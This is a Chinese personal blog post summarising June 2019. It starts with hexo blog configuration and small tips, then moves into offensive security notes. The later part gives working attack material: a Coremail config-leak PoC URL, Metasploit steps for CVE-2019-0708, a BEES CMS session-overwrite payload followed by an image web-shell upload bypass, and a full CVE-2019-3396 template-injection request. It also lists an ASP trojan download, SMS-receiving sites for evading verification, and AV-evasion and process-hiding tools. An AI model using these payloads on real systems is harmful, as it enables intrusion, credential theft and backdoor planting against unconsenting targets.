一九年六月总结


hexo倒腾

问题 404页面不能正常显示

使用官方给的代码时

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8;"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="robots" content="all" />
<meta name="robots" content="index,follow"/>
<link rel="stylesheet" type="text/css" href="https://qzone.qq.com/gy/404/style/404style.css">
</head>
<body>
<script type="text/plain" src="http://www.qq.com/404/search_children.js"
charset="utf-8" homePageUrl="/"
homePageName="回到我的主页">
</script>
<script src="https://qzone.qq.com/gy/404/data.js" charset="utf-8"></script>
<script src="https://qzone.qq.com/gy/404/page.js" charset="utf-8"></script>
</body>
</html>

本地环境正常显示,不过推到github后就成下图所示了

原因

在知乎上看到有人说出现该问题的原因是github个人页强制使用https协议,而上面给的代码是http的,因此无法加载样式表。

解决方法

方法1

使用购买的域名指向自己的github个人主页,增加CNAME文件,然后调用公益404页面不会出现混合内容那个问题。(还是需要开启https协议!!!!!)

方法2

使用以下代码达到相同的效果 ps:返回主页,后面链接改成自己的即可

1
2
3
4
5
6
7
8
9
10
<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta charset="UTF-8" />
<title>404</title>
</head>
<body>
<script type="text/javascript" src="//qzonestyle.gtimg.cn/qzone/hybrid/app/404/search_children.js" homePageName="返回主页" homePageUrl="https://7iny.jxustctf.top"></script>
</body>
</html>

参考文章

更换背景

我们直接在 NEXT 预留的自定义样式文件 “themes/next/source/css/_custom/custom.styl” 中添加自己的样式即可

为了让背景图平铺窗口我把scheme值改成了Muse

菜单栏透明度设置后搜索功能不能正常使用,我注释掉了那部分代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
body {
background: url(https://raw.githubusercontent.com/N407PengYuYan/img/master/img/index.png);
background-size: cover;
background-repeat: no-repeat;
background-attachment: fixed;
background-position: 50% 50%;
}

// 修改主体透明度
.main-inner {
background: #fff;
opacity: 0.8;
}

// 修改菜单栏透明度
.header-inner {
opacity: 0.9;
}

参考文章

实用方法

win10添加网络打印机

控制面板->查看方式按小图标->凭据管理器->添加Windows凭据->输入网络打印机的IP地址,用户密码->命令行输入目标IP地址\\xxx.xxx.xx.xxx

参考文章

校园宽带PPPOE拨号

路由器登陆选择宽带拨号
电信宽带:学号@telecom+密码(默认密码:身份证号后六位)
移动宽带:学号@cmcc+密码(默认密码:身份证号后六位)
联通宽带:学号@unicom+密码(默认密码:身份证号后六位)

参考文章

免费接码平台

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
国内免费接码平台

https://sms.cm
https://www.pdflibr.com
https://www.becmd.com
http://www.smszk.com

国外免费接码平台

https://zh.mytrashmobile.com(中文)
https://ch.freephonenum.com(中文)
SMSReceiveFree:https://smsreceivefree.com
Receive SMS Online for FREE:https://www.receive-sms-online.info
Receive a SMS Online:https://receive-a-sms.com
Free SMS Numbers Online:https://smsnumbersonline.com
Receive SMS online for Free:https://sms-online.co/receive-free-sms
Receive-SMS:https://receive-sms.com
Receive FREE SMS online:http://receivefreesms.com
RECEIVE SMS ONLINE:https://www.receivesmsonline.net
Free Online Phone:https://www.freeonlinephone.org
Receive SMS Online:http://receive-sms-online.com
TextNow:https://www.textnow.com
Textfree:https://www.pinger.com/text-free/
SELLAITE:http://sms.sellaite.com/
Twilio:https://www.twilio.com/
https://receive-sms.com/
http://receive-sms-online.com/
http://sms.sellaite.com/
http://hs3x.com/
http://receivefreesms.net
http://receivesmsonline.in
http://www.receive-sms-now.com
https://sms-receive.net
https://www.receivesms.net
http://www.freesmsverifications.com
http://receiveonlinesms.biz
http://receivesmsverification.com
https://www.receivesms.co
http://receiveonlinesms.com

参考文章

借助插件科学上网

有时候代理会被大面积封锁,可是我们又需要进行学习,那么我们可以用第三方插件来满足我们的搜索需求

Ghelper源码安装chrome插件

1.打开你的Chrome浏览器的 更多工具>扩展程序页面.
或者直接在网址输入: chrome://extensions/
2.这个页面点击 “添加已解压的扩展程序”
3.选择本次下载包里的 ghelper_source 目录
4.确认后就行了.

官网下载地址

木马下载

asp木马

Coremail 0day 敏感文件泄露漏洞

POC:

/mailsms/s?func=ADMIN:appState&dumpConfig=/

通过域名或者IP等地址+POC即可获取目标邮件服务器配置文件,配置文件包括:文件路径、IP、端口、数据库用户、密码等敏感信息。

参考文章

2.apiws

http://host/apiws/services/

http://host/apiws/services/API?wsdl

参考文章

cnvd通告

漏洞CVE-2019-0708

影响:该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp * 系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的 。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。

kali依次执行验证

1
2
3
4
msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS x.x.x.x
exploit

BEES企业网站管理系统漏洞

1.漏洞地址http://host/mx_form/mx_form.php?id=2

1
用火狐里面的firebug插件用post参数,覆盖session值,之后便可直接登录后台:_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

2.执行之后访问http://host/admin/admin.php
3.点击内容管理—>上传照片管理—>修改
4.上传图片马,用burpsuite拦截将jpg改为php,即可绕过上传限制

CVE-2019-3396

漏洞描述中指出Confluence Server与Confluence Data Center中的Widget Connector存在服务端模板注入漏洞,攻击者能利用此漏洞能够实现目录穿越与远程代码执行。

漏洞分析参看文章

Burp Suit复现

1
2
3
4
5
6
7
8
9
10
11
12
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer:http://x.x.x.x/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 168

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}

更多功能

参考1

获取shell

工具

Github渗透工具资源整合

超级弱口令多线程检查审计工具SNETCracker
可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。下载地址

Github关键字监测、告警、发现下载地址

AVIator是一个后门生成器实用程序,它使用加密和注入技术来绕过AV检测。下载地址

Vxscan:一款用于渗透测试的多功能扫描工具下载地址

thinkphp v5.x 远程代码执行漏洞-POC集合下载地址

实战中常用工具汇总

1.进程隐藏工具
libprocesshider
Reptile
2.流量代理工具proxy
dog-tunnel
3.Linux辅助提权工具LinEnum.sh
LinEnum
4.脏牛提权工具c0w64
c0w64
5.内网流量代理工具agent.exe
nps

-------------The End-------------